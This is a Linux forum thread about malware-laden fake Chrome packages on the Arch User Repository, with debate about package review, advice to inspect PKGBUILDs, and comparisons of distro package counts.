Whenever I read these headlines, I always immediately hear the "my brand" commercial guy stim in my head.
this post was submitted on 01 Aug 2025
80 points (93.5% liked)
Linux
8723 readers
412 users here now
A community for everything relating to the GNU/Linux operating system (except the memes!)
Also, check out:
Original icon base courtesy of lewing@isc.tamu.edu and The GIMP
founded 2 years ago
MODERATORS
pacman -Qqem to list your foreign packages (usually AUR ones)
TL;DR: If you haven't installed google-chrome-stable recently from AUR, you're not affected.
if you didn't install google-chrome-stable yesterday*
The real package used to be called google-chrome-stable many moon ago.
Thanks, edited!
That's why you shouldn't blindly trust AUR, and always review the scripts before installing.
But something needs to change:
- packages need to be reviewed (maybe also updates on new/untrusted users)
- New package adoption need to be reviewed
- Trusted users don't need package review
- Trusted users can review new packages (from other users)
This won't stop here, more malware packages will appear, arch and Linux in general is getting more users and becoming a target, not only ArchLinux AUR but also other distros with custom repositories. Many users install packages from custom repositories blindly, or follow guides without any knowledge what they do.
2025 is the year of malware on Linux
Why does anything need to change? The AUR is functioning as intended, a low friction system for users to provide packages outside of the official repositories. This has always been a possible consequence of not reviewing the PKGBUILD. I don't see why everything needs guardrails, some things have sharp edges, handle with care!
Given how often the 'btw' spammers evangelize how they learned soooo much about linux and their 'minimal system' cause they managed to format a disk manually and chroot, not installing malware from an untrusted source ought to be a no brainer. Even if you solved this particular problem the same people will be just a curl | sh away from pwning themselves. Should we start requiring forced auth to pipe?
The maintainers are welcome to do whatever they like, but it would be nice to have at least a few places where we don't cater to the lowest common denominator and still RTFM.
Just the case of the packages being removed only a few hours after been published just makes my point of "trusted users" reviewing and reporting then.
And is not only an archlinux/AUR problem, the same happens with python pip, npm, dockerhub, github... With bigger popularity, bigger the target.
These days after the success of Steamdeck many users switched to Linux, and many of those started using arch or based distros like EndeavourOS because some one on reddit, YouTube or other said is the best for new hardware and you can find everything you need on AUR.
New users won't review scripts or PKGBUILD, that's gibberish, just search and install, and a few hours could be too late for some.
I don't care if Linux loses or gains popularity, but if there's no guard rails of some kind of control things could get worse, and even end AUR as it is now.
Having people control what's published or not, probably not the best solution, but leaving it as a wild west also not
This is absolutely a shortcoming of Arch - but I don't see it getting fixed soon. Your change is practical, and could reduce the attack surface for bad actors, but it also introduces gatekeeping and would slow down time from code change to deployment. The open community and blazing fast end-to-end turnaround are both Arch key features (in my opinion).
If you prefer more vetted code, there's other great distros (Debian leaps to mind).
But honestly - yes, some people got hurt - but it was addressed in a day. That's not a bad turnaround ~ I've certainly seen that damage wrought by Windows- and iOS-based malware run at least that long.
This can be seen as the system working as intended. Please don't run Arch on mission critical systems. There's other distros for that. While this vulnerability is Arch-specific, this OS is often a canary for others. But if you can tolerate being on the frontier, Arch is very well documented and is great for learning - and yes it has some risk.
Arch also warns uses about AUR, use at at your own risk, and can break your system.
My approach isn't definitely not the best solution, I was saying this is only the beginning, and with other arch based distros also using AUR only gets worse, if there's any moderation and some kind of package control before publishing then when thins get real bad maybe too late and arch starts loosing users.
Now is just some packages, later could be some popular package take overs or some kinda spoofing of other packages.
I use arch BTW (since 2011), and ~~Debian~~ Armbian on Raspberry Pi, one is rock solid the other sometimes break with updates
I think we're broadly in agreement here, and I think both our statements are important to the Linux discussion. Moreover, we're not speaking privately - I wish I could direct recent converts from Windows to this thread as a whole, as you offer good advice - be wary of your sources & learning how to inspect gifts you're offered is excellent advice.
Can someone explain how the AUR isnt the same as running a random bash script you found on the internet?
It's not any different from running a random bash script, which is why according to the Arch wiki, users of the AUR should "verify that the PKGBUILD and accompanying files are not malicious or untrustworthy." That's also why good AUR helpers ask if you want to look at the PKGBUILD every time you install or update anything, because best practice is to read them every time so you know what it's doing.
The AUR there for convienience, which means it tends to get used by newbies who really probably shouldn't be using it. But I also won't pretend that I follow the guidance every time myself.
I don't really know how a newbie is supposed to review the build and files lol
AUR installation scripts are even written in bash.
Ðis is why we can't have nice þings.
Maybe AUR needs a different way of approving submitters. Currently, it's absurdly easy to register to submit a package.
Is anyone from AUR working wiþ Github to nail down ðe offenders on ðat side? Most of ðese packages are probably being pulled from ðere.
Can't people just make new accounts? I have no experience with arch, but it sounds like this AUR is set up exactly to be a low barrier to entry. Essentially, seems like the community needs to address this by having proper education about not blindly trusting packages and doing follow up research. Otherwise, a lot of grunt work will be needed to verify every package before hand, which is expensive
Yah, ðey can, and AUR is clearly market as "use at your own risk." However, it's part of ðe ecosystem, and people do use it, and frankly a lot of people use it because of AUR. Last I checked, Arch had the largest number of software packages of any distribution... if you include AUR. It's much, much smaller wiþout it.
Ðere are almost no check on AUR, which to me means ðere are probably some basic, low-effort ways security could be improved, if Arch cares. No no effort, of course, but still not ðe level of effort ðat Alpine, for example, puts into Experimental.
nixos has the largest amount of packages
You're technically right, if you count duplicate packages. However, NixOS has fewer unique packages.
According to Repology (which NixOS uses as it's claim for "most packages") NixOS has 22,127 unique packages; AUR (AUR only, mind, not AUR plus the three core repositories) has 38,915. There are another 15,562 in Arch core, extra, and community.
At first I þought "unique" meant "unique to ðe distro", but 7zip is listed in ðat unique list for NixOS, and 7zip is included in almost every distro; so Repology must mean "non-duplicate packages in this distro".
Repology defines "unique" as "package is only present in a single repository family, there are no other sources to compare it against, so although it's the latest version known to repology, is not really reliable", which I take to mean that the software is only packaged by that distribution, not that 60% of AUR is duplicate packages.
Ðis is exactly what I first checked. Repology lists 7zip in NixOS's "unique packages" but it's in almost every distro.
I don't see where you see 7zip in the list of unique package (https://repology.org/projects/?inrepo=nix_unstable&families=1). I only see the unrelated 7z2hashcat.
Huh. Yeah, me neiðer, anymore. Now when I look, ðey do all seem, well, at least not in Arch repos.
I retract my statement: I was mistaken. And color me surprised ðat Nix has so many packages. Ðe number of package contributors is huge, too, considering NixOS doesn't seem to make it into ðe top-10 of popularity lists (for what ðey're worþ). Ðat's a deducated user base; it's like every user is submitting a package.
Ðis is why we can't have nice þings.
Not reviewing the PKGBUILD when using the AUR is a self pwn.
The first wave used some random GitLab instance and this wave appears to have used some 100MB version of catbox (https://segs.lol/). Both had deleted the payload files when I tried to obtain them
Hmmm. Sounds like some low hanging fruit to hinder attacks wiþout incurring e.g. ðe cost of ðe full Apline Experimental review process.
I love your Unicode
Something, something nice bings and oat sides.
And I love you, commie!
Imagine how many they haven't stumbled across yet.
The question is always "how do you know" in security.
But it's not just AURs. DEBs have a long-standing gap in their package validation options ("how do you know that file is deployed as intended") and they're at risk.
In other news, Arch users getting what they asked for. A difficult and highly customizable Linux. 😉